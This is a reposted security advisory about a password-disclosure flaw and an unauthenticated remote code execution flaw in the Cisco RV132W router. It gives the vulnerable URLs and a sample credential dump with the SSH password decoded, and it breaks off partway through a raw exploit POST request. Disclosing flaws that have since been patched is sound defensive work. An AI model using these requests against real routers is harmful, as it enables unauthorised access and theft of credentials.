{"id":11439,"date":"2018-02-11T14:19:06","date_gmt":"2018-02-11T22:19:06","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/02\/11\/news-5210\/"},"modified":"2018-02-11T14:19:06","modified_gmt":"2018-02-11T22:19:06","slug":"news-5210","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/02\/11\/news-5210\/","title":{"rendered":"SSD Advisory \u2013 Hack2Win &#8211;  Cisco RV132W Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 11 Feb 2018 06:10:03 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3590\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3590');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes two (2) vulnerabilities found in Cisco RV132W Wireless N VPN version  1.0.1.8 <\/p>\n<p>The Cisco RV132W Wireless-N ADSL2+ VPN Router is &#8220;easy to use, set up, and deploy. This flexible router offers great performance and is suited for small or home offices (SOHO) and smaller deployments.&#8221;<\/p>\n<p>The vulnerabilities found are:<\/p>\n<ul>\n<li>Information Disclosure That Leads to Password Disclosure<\/li>\n<li>Unauthenticated WAN Remote Code Execution<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> A security researcher from, NHSC, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> Cisco were informed of the vulnerabilities and released patches to address them: https:\/\/tools.cisco.com\/security\/center\/content\/CiscoSecurityAdvisory\/cisco-sa-20180207-rv13x<\/p>\n<p>CVE: CVE-2018-0125 \/ CVE-2018-0127<br \/> <span id=\"more-3590\"><\/span><\/p>\n<p><strong><u>Vulnerabilities details<\/u><\/strong><\/p>\n<p><strong>Information Disclosure that Leads to Password Disclosure<\/strong><br \/> User controlled input is not sufficiently filtered, unauthenticated user can access the following page:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a80c15a63c76384172900\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/[TARGET_IP]\/dumpmdm.cmd<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>The output will include the admin SSH password (base64)<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a80c15a63c7d094175596\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;AdminUserName&gt;redalert&lt;\/AdminUserName&gt;   &lt;AdminPassword&gt;61eac78956b08e9b7c499691eddbe2e2&lt;\/AdminPassword&gt;   &lt;AdminPasswordHash&gt;(null)&lt;\/AdminPasswordHash&gt;   &lt;AdminCliEnable&gt;TRUE&lt;\/AdminCliEnable&gt;   &lt;SupportUserName&gt;support&lt;\/SupportUserName&gt;   &lt;SupportPassword&gt;support&lt;\/SupportPassword&gt;   &lt;SupportPasswordHash&gt;(null)&lt;\/SupportPasswordHash&gt;   &lt;SupportCliEnable&gt;TRUE&lt;\/SupportCliEnable&gt;   &lt;UserUserName&gt;user&lt;\/UserUserName&gt;   &lt;UserPassword&gt;user&lt;\/UserPassword&gt;   &lt;UserPasswordHash&gt;(null)&lt;\/UserPasswordHash&gt;   &lt;UserCliEnable&gt;TRUE&lt;\/UserCliEnable&gt;   &lt;logintimeout&gt;30&lt;\/logintimeout&gt;   &lt;SetAdminUser&gt;TRUE&lt;\/SetAdminUser&gt;   &lt;SetGuestUser&gt;FALSE&lt;\/SetGuestUser&gt;   &lt;EnableAdminUser&gt;TRUE&lt;\/EnableAdminUser&gt;   &lt;EnableGuestUser&gt;FALSE&lt;\/EnableGuestUser&gt;   &lt;GuestUserName&gt;guest&lt;\/GuestUserName&gt;   &lt;GuestPassword&gt;574ea313a3b02211d193d01606942111&lt;\/GuestPassword&gt;   &lt;GuestPasswordHash&gt;(null)&lt;\/GuestPasswordHash&gt;   &lt;GuestCliEnable&gt;TRUE&lt;\/GuestCliEnable&gt;   &lt;GuestUserIsInUse&gt;FALSE&lt;\/GuestUserIsInUse&gt;   &lt;FirstLogin&gt;TRUE&lt;\/FirstLogin&gt;   &lt;GuestLoginTimeout&gt;30&lt;\/GuestLoginTimeout&gt;   &lt;loginchecked&gt;0&lt;\/loginchecked&gt;   &lt;sshpass&gt;cmVkYWxlcnQxMzIkAA==&lt;\/sshpass&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-26\">26<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-1\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">AdminUserName<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">redalert<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">AdminUserName<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-2\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">AdminPassword<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">61eac78956b08e9b7c499691eddbe2e2<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">AdminPassword<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-3\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">AdminPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">AdminPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-4\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">AdminCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">TRUE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">AdminCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-5\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">SupportUserName<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">support<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SupportUserName<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-6\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">SupportPassword<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">support<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SupportPassword<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-7\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">SupportPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SupportPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-8\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">SupportCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">TRUE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SupportCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-9\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">UserUserName<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">UserUserName<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-10\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">UserPassword<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">UserPassword<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-11\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">UserPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">UserPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-12\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">UserCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">TRUE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">UserCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-13\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">logintimeout<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">30<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">logintimeout<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-14\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">SetAdminUser<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">TRUE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SetAdminUser<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-15\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">SetGuestUser<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">FALSE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SetGuestUser<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-16\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">EnableAdminUser<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">TRUE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">EnableAdminUser<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-17\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">EnableGuestUser<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">FALSE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">EnableGuestUser<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-18\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">GuestUserName<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">guest<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">GuestUserName<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-19\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">GuestPassword<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">574ea313a3b02211d193d01606942111<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">GuestPassword<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-20\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">GuestPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">GuestPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-21\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">GuestCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">TRUE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">GuestCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-22\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">GuestUserIsInUse<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">FALSE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">GuestUserIsInUse<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-23\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">FirstLogin<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">TRUE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">FirstLogin<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-24\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">GuestLoginTimeout<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">30<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">GuestLoginTimeout<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-25\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">loginchecked<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">loginchecked<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-26\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">sshpass<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">cmVkYWxlcnQxMzIkAA<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sshpass<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0033 seconds] -->  <\/p>\n<p> Decoding: \u201ccmVkYWxlcnQxMzIkAA==\u201d base64 decodes to \u201credalert132$\u201d which is our test unit password.<\/p>\n<p><strong>Unauthenticated WAN Remote Code Execution<\/strong><br \/> User controlled input is not sufficiently filtered, unauthenticated user can access the following page:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a80c15a63c81213996576\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/[TARGET_IP]\/tr69cfg.cgi<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c81213996576-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c81213996576-1\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/[TARGET_IP]\/tr69cfg.cgi<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0001 seconds] -->  <\/p>\n<p>By sending POST request with modify parameter <em>tr69cBoundIfName=<\/em> an unauthenticated user can execute arbitrary code on the victims router <\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a80c15a63c84765906036\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> ===  POST \/tr69cfg.cgi HTTP\/1.1  Host: 192.168.1.1  User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) 